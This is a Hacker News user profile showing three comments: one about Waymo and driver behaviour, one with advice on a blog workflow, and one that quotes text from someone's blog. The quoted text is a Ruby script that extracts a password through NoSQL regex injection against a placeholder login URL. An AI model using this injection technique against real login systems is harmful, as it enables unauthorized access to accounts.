HN user

tissueapp

1 karma
Posts0
Comments3
View on HN
No posts found.

Very cool. I did see this comment (prob an error):

In https://blog-project-fe0ba.web.app/post/REL7NZPjcBL7i19jtk2b

Error: require 'httpx' username = 'admin' password = '' url = 'http://example.org/login' # CHARSET = (?!..?~).to_a # all ASCII printable characters CHARSET = ['0'..'9','a'..'z','-'] # alphanumeric + '-' GET_EXCLUDE = ['*','+','.','?','|', '#', '&', '$'] session = HTTPX.plugin(:persistent) while true CHARSET.each do |c| unless GET_EXCLUDE.include?(c) payload = "?username=#{username}&password[$regex]=^#{password + c}" res = session.get(url + payload) if res.body.to_s.match?('Yeah') puts "Found one more char : #{password + c}" password += c end end end end

I wonder if drivers would get more aggressive (or less aggressive) if they see a Waymo on the road.

Perhaps this driver thought that Waymo would have stopped once it noticed what was happening:

"In Tempe, Arizona, an SUV 'overtook the Waymo AV on the left' and then 'initiated a right turn,' cutting the Waymo off and causing a crash. A passenger in the SUV said they suffered moderate injuries"

Making This Blog 2 years ago

One thing to think about- you could write everything in the public folder (as opposed to writing in private then moving to public). Then the pages would just be WIP, and readers could see "the sausage being made".

Also makes it easier to create a command or shortcut that would commit + push.